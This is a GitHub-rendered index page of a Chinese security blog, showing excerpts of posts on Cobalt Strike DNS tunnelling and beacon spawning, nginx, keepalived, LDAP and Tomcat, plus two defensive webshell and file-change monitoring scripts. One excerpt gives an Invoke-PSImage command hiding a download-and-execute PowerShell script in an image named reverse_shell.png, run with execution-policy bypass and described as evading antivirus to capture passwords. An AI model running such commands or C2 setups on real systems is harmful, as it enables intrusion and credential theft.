forked from fengziHK/fengzihk.github.io
-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
795 lines (527 loc) · 58.5 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
<!DOCTYPE html>
<html lang="en">
<!-- Head tag -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!--Description-->
<meta name="description" content="专注于web和内网攻防研究,安全开发,安全运维,架构安全,热衷于高质量实用干货分享,提供全方位网络安全培训,更多请扫码关注自己博客下方的微信公众号,同时也期待更多志同道合的兄弟能一起并肩作战">
<!--Author-->
<meta name="author" content="klion">
<!--Open Graph Title-->
<meta property="og:title" content="klion's blog"/>
<!--Open Graph Description-->
<meta property="og:description" content="专注于web和内网攻防研究,安全开发,安全运维,架构安全,热衷于高质量实用干货分享,提供全方位网络安全培训,更多请扫码关注自己博客下方的微信公众号,同时也期待更多志同道合的兄弟能一起并肩作战" />
<!--Open Graph Site Name-->
<meta property="og:site_name" content="klion's blog"/>
<!--Type page-->
<meta property="og:type" content="website" />
<!--Page Cover-->
<meta name="twitter:card" content="summary" />
<!-- Title -->
<title>klion's blog</title>
<!-- Bootstrap Core CSS -->
<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">
<!-- Custom Fonts -->
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
<!-- Gallery -->
<link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet" />
<!-- Custom CSS -->
<link rel="stylesheet" href="/css/style.css">
<!-- Google Analytics -->
</head>
<body>
<div class="bg-gradient"></div>
<div class="bg-pattern"></div>
<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
<div class="menu-container">
<ul>
<li class="menu-item">
<a href="/">
home
</a>
</li>
<li class="menu-item">
<a href="/archives">
archives
</a>
</li>
<li class="menu-item">
<a href="/about">
about me
</a>
</li>
<li class="menu-item">
<a href="/contact">
blogs
</a>
</li>
</ul>
</div>
</div>
<!--Hamburger Icon-->
<nav>
<a href="#menu"></a>
</nav>
<div class="container">
<!-- Main Content -->
<div class="row">
<div class="col-sm-12">
<!--Title and Logo-->
<header>
<div class="logo">
<a href="/"><i class="logo-icon fa " aria-hidden="true"></i></a>
<h1 id="main-title" class="title">klion's blog</h1>
</div>
</header>
<section class="main">
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/31/after-roding/">
关于接下来的路
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-31</span>
<span class="category">
<a href="/categories/接下来的路/">接下来的路</a>
</span>
</div>
</div>
<div class="content">
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">首先,在这里先跟兄弟们道个歉,可能从今天开始,我就要独自完成一整套稍微系统的内网渗透教程</div><div class="line">并准备整理出书,所以,博客的更新不得不先暂停一段时间,说实话,这也是思考很久之后的结果</div></pre></td></tr></table></figure>
<p>主要是考虑到以下原因<br><figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">一、因为博客的内容过于松散杂乱,并不适合系统学习</div></pre></td></tr></table></figure></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">二、随着文章量越来越大,加上自己的不断成长总是不知不觉会发现之前文章中的很多不完美的地方</div><div class="line"> 但苦于个人精力有限并不是每个地方都能看到,所以现在才想全部重新系统的开始,对大家来讲,这无疑是件好事,当然,质量肯定会比之前那些要好很多很多</div></pre></td></tr></table></figure>
<figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">三、另外,也是想通过这种方式来时刻督促着自己学习和巩固,因为这对自己本身就是一种比较大的挑战</div><div class="line"> `你自己会` 和 `你能把别人清清楚楚的讲会` 是完全两个不同的级别,有些朋友可能深有体会</div></pre></td></tr></table></figure>
</div>
<a href="/2017/12/31/after-roding/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/28/cobalt-strike-dns/">
对 Cobalt Strike DNS隧道的理解与实战
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-28</span>
<span class="category">
<a href="/categories/DNS隧道/">DNS隧道</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 开始之前,有必要先稍微理解下基于<code>dns beacon的大致通信过程</code>,其实,非常非常简单,前提是你对dns的解析过程早已经烂透于心,不熟悉的朋友可以先去参考前段时间写的 <a href="https://klionsec.github.io/2017/12/11/Dns-tips/">[DNS 深度理解 一] </a>,把基础打扎实了,再回过头来理解这些东西自然就易如反掌了<br><figure class="highlight haml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">-<span class="ruby">> beacon shell会向指定的域名发起正常的dns查询</span></div><div class="line"> -<span class="ruby">> 中间依然是经过一些列的常规dns迭代及递归查询,大致过程就是,一直从根开始找,直到找到我们自己的ns服务器,最后再定位到团队服务器ip,仅此而已</span></div><div class="line"> -<span class="ruby">> 也就是说,第一次通信可能会慢点,后续就会稍微快些,不过说实话,dns再快也快不到哪里去,毕竟,我们要的是足够的隐蔽,而不一味追求速度,不然容易露点</span></div></pre></td></tr></table></figure></p>
<p>0x02 废话说完,我们就开始来尝试在实战中应用,首先,你要先买台<code>vps</code>,亚马逊或者<code>vultr</code>都挺不错的,自己也一直在用,之后装好系统,推荐用<code>ubuntu</code>,此处演示用的是<code>ubuntu 16.04.2</code>,具体的系统安装方法直接一路点点点就好了,全程傻瓜化,大概等个六七分钟,待系统初始化完成就可以用ssh连上去了<br>
</div>
<a href="/2017/12/28/cobalt-strike-dns/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/28/cobalt-strike-spawn/">
灵活使用 cobalt strike 的 `spawn` 功能
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-28</span>
<span class="category">
<a href="/categories/spawn/">spawn</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于 beacon 强大的派生功能<br><figure class="highlight clean"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">简单理解,所谓的`派生`,即仅仅通过一个beacon shell就可以再孵化出n个shell,shell与shell之间相当于以一种级联的形式存在的</div><div class="line">而团队服务器则位于这些节点的根节点位置,连接这些节点的则是`beacon隧道`自己,此功能可有效提高一个渗透团队成员间的协同作战能力,快速共享渗透资源</div><div class="line">当然,这也势必会在后期形成一个非常复杂的`渗透网络`,不过这也正好方便大家同时多点切入,说白点儿,其实就类似于一个大型的分布式入侵系统</div><div class="line">而这一切的根本保证就是我们在公网中的各个团队服务器节点,只要团队服务器节点不挂,权限就不太容易丢,除非活不干净,被人主动发现了</div><div class="line">因为其内部涉及到的细节还非常深,也绝不是一两句话就能说清楚的,但作为使用者,我们只需理解其大致的工作流程即可</div><div class="line">如果你自己真的有非常强的 RAT & 逆向 & 协议分析 能力,可以再继续深入研究,始终认为,cobalt strike 确实是一个非常值得深入学习的优秀样本</div><div class="line">如果能真正把它搞通透了,基础协议这一块对你来讲,基本就不再有盲区,废话不多说,我们还是在实战中多多体会吧...</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/28/cobalt-strike-spawn/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/26/powershell-pic-execute/">
通过图片免杀执行远程powershell代码
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-26</span>
<span class="category">
<a href="/categories/PSImage/">PSImage</a>
</span>
</div>
</div>
<div class="content">
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">https:<span class="comment">//github.com/klionsec/Invoke-PSImage</span></div><div class="line">C:\>powershell -exec bypass</div><div class="line">PS C:\> Import-Module .\Invoke-PSImage<span class="selector-class">.ps1</span></div><div class="line">PS C:\> Invoke-PSImage -Script .\Download-Execute-PS<span class="selector-class">.ps1</span> -Image .\large<span class="selector-class">.JPG</span> -Out .\reverse_shell<span class="selector-class">.png</span> -Web</div></pre></td></tr></table></figure>
<p>免杀抓取系统用户明文密码</p>
<p><img src="/img/remote ps code.gif" alt=""><br>
</div>
<a href="/2017/12/26/powershell-pic-execute/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/25/modify-webshell/">
实时精准侦测站点目录中的各类 webshell
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-25</span>
<span class="category">
<a href="/categories/webhack/">webhack</a>
</span>
</div>
</div>
<div class="content">
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#!/bin/bash</span></div><div class="line"><span class="comment"># author by klion</span></div><div class="line"><span class="comment"># 2017.12.25</span></div><div class="line"><span class="comment"># Delete webshell auto </span></div><div class="line"></div><div class="line">webshell_log=<span class="string">"/var/log/webshell.log"</span></div><div class="line">upload_shell=<span class="string">"/var/log/modify.tmp"</span></div><div class="line"></div><div class="line"><span class="comment"># 只要一检测到有新事件发生就立马打包上传检测</span></div><div class="line">[ -s <span class="variable">$webshell_log</span> ] &&{</div><div class="line"> awk -F <span class="string">" "</span> <span class="string">'{print $3}'</span> <span class="variable">$webshell_log</span> |grep -E <span class="string">".php$"</span>| sort -u > <span class="variable">$upload_shell</span></div><div class="line"> cat <span class="variable">$upload_shell</span> |xargs zip ./maybeshell.zip</div><div class="line"> <span class="built_in">echo</span> `curl https://scanner.baidu.com/enqueue -F archive=@maybeshell.zip` | mail -s <span class="string">"webshell detect url api"</span> klion@protonmail.com </div><div class="line"> sleep 5</div><div class="line"> > <span class="variable">$webshell_log</span> && > <span class="variable">$upload_shell</span> && rm -fr ./maybeshell.zip</div><div class="line">}</div></pre></td></tr></table></figure>
</div>
<a href="/2017/12/25/modify-webshell/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/25/modify-hacked/">
用shell对指定站点进行简单的实时入侵预警
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-25</span>
<span class="category">
<a href="/categories/webhack/">webhack</a>
</span>
</div>
</div>
<div class="content">
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#!/bin/bash</span></div><div class="line"><span class="comment"># author by klion</span></div><div class="line"><span class="comment"># 2017.12.25</span></div><div class="line"><span class="comment"># Real-time monitoring of Web Directory script</span></div><div class="line"></div><div class="line">web_dir=<span class="string">"/usr/local/nginx/html/bwapp/bWAPP/"</span></div><div class="line">oldnum=`wc -l web_history_db.log | awk -F <span class="string">" "</span> <span class="string">'{print $1}'</span>`</div><div class="line">newnum=`find <span class="variable">$web_dir</span> -<span class="built_in">type</span> f | wc -l`</div><div class="line">md5num=`md5sum -c web_history_db.log | grep -i FAILED | wc -l`</div><div class="line"></div><div class="line"><span class="comment"># 先对指定的站点目录创建指纹库</span></div><div class="line">[ ! -f web_history_db.log ] && {</div><div class="line"> find <span class="variable">$web_dir</span> -<span class="built_in">type</span> f | xargs md5sum > ./web_history_db.log</div><div class="line">}</div><div class="line"></div><div class="line"><span class="comment"># 和新文件对比指纹,如果发现不对,就马上发信通知,并带上被改动的文件路径一起</span></div><div class="line">[ <span class="variable">$md5num</span> -ne 0 ] && {</div><div class="line"> md5sum -c web_history_db.log | grep -i <span class="string">"FAILED"</span> | awk -F <span class="string">":"</span> <span class="string">'{print $1}'</span> > web_mod_`date +%Y-%m-%d-%H-%M-%S`.web.log</div><div class="line"> log_file=`ls -l *.web.log | head -n 1 | awk -F <span class="string">" "</span> <span class="string">'{print $9}'</span>`</div><div class="line"> mail -s <span class="string">"Your website may be hacked, Please check it as soon as possible"</span> klion@protonmail.com < <span class="variable">$log_file</span>;sleep 5</div><div class="line"> rm -fr <span class="variable">$log_file</span></div><div class="line">}</div><div class="line"></div><div class="line"><span class="comment"># 对比文件个数,发现不对,同样是立马发信,因为有可能要同时监控很多个站点目录,所以就顺便把具体的站点路径也带上了</span></div><div class="line">[ <span class="variable">$oldnum</span> -ne <span class="variable">$newnum</span> ] && {</div><div class="line"> <span class="built_in">echo</span> <span class="string">"website directory is <span class="variable">$web_dir</span>"</span> | mail -s <span class="string">"web directory have new file created "</span> klion@protonmail.com ;sleep 5</div><div class="line">}</div></pre></td></tr></table></figure>
</div>
<a href="/2017/12/25/modify-hacked/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/23/keepalived-nginx/">
keepalived + nginx 初步实现高可用
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-23</span>
<span class="category">
<a href="/categories/keepalived-高可用/">keepalived 高可用</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于 keepalived<br><figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">早期是专为 `LVS` 设计的,主要用来监控LVS集群中各个节点状态</div><div class="line">内部基于 `VRRP协议` 实现,即`虚拟路由冗余协议`,从名字不难看出,协议本身是用于保证实现路由节点高可用的</div></pre></td></tr></table></figure></p>
<p>0x02 所谓的 VRRP 协议<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">简单来讲,即将N台提供相同功能的路由器组成一个路由器组,在这个组里有一个master和多个<span class="keyword">backup</span></div><div class="line">一般情况下,<span class="keyword">master</span>是由选举算法产生的,另外需要注意的是,只有在 <span class="keyword">master</span> 上才有一个用于对外提供服务的虚拟ip</div><div class="line">其它的<span class="keyword">backup</span>都是没有的,当<span class="keyword">master</span>在对外提供服务时,其它的<span class="keyword">backup</span>又在干什么呢</div><div class="line">很简单,当<span class="keyword">master</span>在对外提供服务时,它同时也在不停的向所有的<span class="keyword">backup</span>发送VRRP状态信息 <span class="string">`说白点儿就是心跳包`</span></div><div class="line">告诉所有<span class="keyword">backup</span>们,说,<span class="string">'我还没累死,你们先歇着,等我挂了,你们再上'</span>,然后,所有的<span class="keyword">backup</span>就会一直在那儿闲着不停地接收这样的状态信息</div><div class="line">当某一时刻,<span class="keyword">backup</span>突然没再接到这样的状态回应时,就说明<span class="keyword">master</span>已经光荣牺牲了</div><div class="line">所有的<span class="keyword">backup</span>会再重新用选举算法,把优先级最高的<span class="keyword">backup</span>升级为<span class="keyword">master</span>继续对外提供服务,以此保证了服务的持续可用性,即所谓的高可用</div></pre></td></tr></table></figure></p>
<p>0x03 借助 keepalived 在web上的高可用实现<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">首先,在所有需要进行高可用的web节点机器上部署好keepalived,并在节点中设置一个master,其它的则全部设为<span class="keyword">backup</span></div><div class="line">一旦<span class="keyword">backup</span>接收不到来自<span class="keyword">master</span>的心跳数据,即认为<span class="keyword">master</span>已挂掉,<span class="keyword">backup</span>随即就会接管<span class="keyword">master</span>的所有资源数据</div><div class="line">当<span class="keyword">master</span>状态恢复时,<span class="keyword">backup</span>会把所有的资源数据再移交给<span class="keyword">master</span>处理,此,即为最简单的web高可用实现</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/23/keepalived-nginx/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/21/nginx-static-dynamic/">
利用 `nginx反向代理` 实现的动静分离
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-21</span>
<span class="category">
<a href="/categories/动静分离/">动静分离</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于 <code>动静分离</code><br><figure class="highlight qml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">主要用于一些较大型的站点架构,这样做一定程度上可以有效减轻后端节点压力,也就是说,有时候你在前端<span class="built_in">url</span>中看到的一个目录,其后端对应的很可能就是一个集群</div><div class="line">另外,这样会使网站更加静态化,利于缓存,可显著提高网站访问速度,有效实现前后端解耦,但这样无疑会加大开发的繁琐程度,前后端只能通过各种接口进行通信</div></pre></td></tr></table></figure></p>
<p>0x02 此次演示环境<br><figure class="highlight css"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="selector-tag">NginxHttp</span> <span class="selector-tag">ip</span>: 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.49</span> 对应域名: <span class="selector-tag">reverse</span><span class="selector-class">.org</span> <span class="selector-tag">nginx</span>反向代理服务器</div><div class="line"><span class="selector-tag">OldLamp</span> <span class="selector-tag">ip</span>: 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.45</span> 对应域名: <span class="selector-tag">www</span><span class="selector-class">.bwapp</span><span class="selector-class">.cc</span> 假设为动态服务器</div><div class="line"><span class="selector-tag">OldLnmp</span> <span class="selector-tag">ip</span>: 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.42</span> 对应域名: <span class="selector-tag">test</span><span class="selector-class">.bwapp</span><span class="selector-class">.org</span> 假设为静态服务器</div></pre></td></tr></table></figure></p>
<p>0x03 务必先统一所有机器的host解析,因为等会儿要直接用域名的方式往后抛,如下<br><figure class="highlight lsl"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"># vi /etc/hosts</div><div class="line"> <span class="number">192.168</span><span class="number">.3</span><span class="number">.42</span> test.bwapp.org bwapp.org</div><div class="line"> <span class="number">192.168</span><span class="number">.3</span><span class="number">.45</span> bwapp.cc www.bwapp.cc</div><div class="line"> <span class="number">192.168</span><span class="number">.3</span><span class="number">.75</span> lvs.org</div><div class="line"> <span class="number">192.168</span><span class="number">.3</span><span class="number">.49</span> reverse.org</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/21/nginx-static-dynamic/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/20/ldap-sec/">
初探 LDAP 安全 [ 一 ]
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-20</span>
<span class="category">
<a href="/categories/LDAP安全/">LDAP安全</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于 ldap 的一些简单科普<br><figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">`ldap` 基于tcp/ip的轻量级目录访问协议,属于X.<span class="number">500</span>目录协议族的一个简化版本</div><div class="line">你可以暂时把它粗暴的理解成 `一种特殊类型的数据库` ,通常,这种数据库文件后缀都为`.ldif`,并使用特殊的节点查询语句来获取相应数据</div><div class="line">实际生产环境中,主要还是用它来做各种查询比较多,既是查询,也就意味着肯定会有大量的读操作</div><div class="line">虽然,ldap也支持一些简单的更新功能,即写,但一般都不会用,因为它在写方面的效率并不高</div><div class="line">如果真的是写比较多,直接用各种关系型数据库代替就好了,实在没必要用ldap,毕竟,术业有专攻</div><div class="line">另外,ldap 跨平台,功能简洁,易管理,配置,读性能也不错,亦可分布式部署`不知道是不是可以把它的分布式理解成windows域的目录树,目录林概念`</div><div class="line">用的最多的可能就是进行`集中身份验证`,最后,我们还需要知道的是,默认情况下,ldap的所有数据都是直接以明文传输的,容易被截获,不过好在它支持ssl</div></pre></td></tr></table></figure></p>
<p>0x02 其它的一些常用目录服务工具<br><figure class="highlight css"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="selector-tag">X</span><span class="selector-class">.500</span> 过于庞大臃肿</div><div class="line"><span class="selector-tag">ldap</span> 轻量且配置简单</div><div class="line"><span class="selector-tag">windows</span>活动目录 有平台限制</div><div class="line"><span class="selector-tag">NIS</span> 个人暂时还没接触过</div></pre></td></tr></table></figure></p>
<p>0x03 了解ldap内部数据的大致存储方式<br><figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">和常规关系型数据库不同的是,ldap并非按照常规的库,表,字段方式来存储数据</div><div class="line">而是按照一种特殊的倒树状结构层级来组织管理数据,此处的树指的就是目录信息树,即`DIT`</div><div class="line">所谓的目录信息树其实相当于专门用来进行读操作的数据库</div><div class="line">在DIT内部则由N个条目`entry`所组成,就相当于我们常规数据库表中每条具体的记录</div><div class="line">而条目的内容则是由具有唯一标识名`DN`的属性[Attribute]及属性对应的值[value]所组成的这么一个集合</div><div class="line">条目为ldap中最基础的操作单位,通常对ldap的增删改查都是以条目为基本单元进行的</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/20/ldap-sec/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/16/tomcat-sec/">
Tomcat 安全部署实战指南
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-16</span>
<span class="category">
<a href="/categories/Tomcat-安全部署实战指南/">Tomcat 安全部署实战指南</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于Tomcat,更多详情大家可直接参考百科说明<br><figure class="highlight avrasm"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="symbol">https:</span>//<span class="built_in">zh</span>.wikipedia<span class="meta">.org</span>/wiki/Apache_Tomcat</div></pre></td></tr></table></figure></p>
<p>此次演示环境<br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">CentOS7 x86_64 <span class="built_in">ip</span>: <span class="number">192.168</span><span class="meta">.3</span><span class="meta">.64</span></div><div class="line">Apache Tomcat/<span class="number">8.5</span><span class="meta">.24</span> 建议大家使用较新版的稳定版本</div></pre></td></tr></table></figure></p>
<p>0x02 首先,在正式部署Tomcat之前,需要先来准备好jdk环境,因为毕竟底层还是在靠java来处理,所以必须要先得有java的运行环境才行,其实,在实际生产环境中,也可以单独使用<code>jre</code>,不过个人觉得这和安全的关系并不大,试想,如果你手里都已经拿到了一个可以运行java的环境了,我在本地用对应版本的jdk编译好了再丢上运行也是一样,防不住啥,太泛泛<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#</span><span class="bash"> tar xf jdk-8u151-linux-x64.tar.gz</span></div><div class="line"><span class="meta">#</span><span class="bash"> mv jdk1.8.0_151/ /usr/<span class="built_in">local</span>/</span></div><div class="line"><span class="meta">#</span><span class="bash"> ln -s /usr/<span class="built_in">local</span>/jdk1.8.0_151/ /usr/<span class="built_in">local</span>/jdk</span></div><div class="line"><span class="meta">#</span><span class="bash"> tar xf apache-tomcat-8.5.24.tar.gz</span></div><div class="line"><span class="meta">#</span><span class="bash"> mv apache-tomcat-8.5.24 /usr/<span class="built_in">local</span>/</span></div><div class="line"><span class="meta">#</span><span class="bash"> ln -s /usr/<span class="built_in">local</span>/apache-tomcat-8.5.24/ /usr/<span class="built_in">local</span>/tomcat</span></div><div class="line"><span class="meta">#</span><span class="bash"> ll /usr/<span class="built_in">local</span>/</span></div><div class="line"><span class="meta">#</span><span class="bash"> vi /etc/profile</span></div><div class="line"> export JAVA_HOME=/usr/local/jdk/ </div><div class="line"> export PATH=$JAVA_HOME/bin:$JAVA_HOME/jre/bin:$PATH </div><div class="line"> export CLASSPATH=.$CLASSPATH:$JAVA_HOME/lib:$JAVA_HOME/jre/lib:$JAVA_HOME/lib/tools.jar</div><div class="line"> export TOMCAT_HOME=/usr/local/tomcat</div><div class="line"><span class="meta">#</span><span class="bash"> <span class="built_in">source</span> /etc/profile</span></div><div class="line"><span class="meta">#</span><span class="bash"> java -version</span></div><div class="line"><span class="meta">#</span><span class="bash"> javac</span></div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/16/tomcat-sec/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/12/samba-sec/">
跨平台快速文件共享 Samba
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-12</span>
<span class="category">
<a href="/categories/Samba/">Samba</a>
</span>
</div>
</div>
<div class="content">
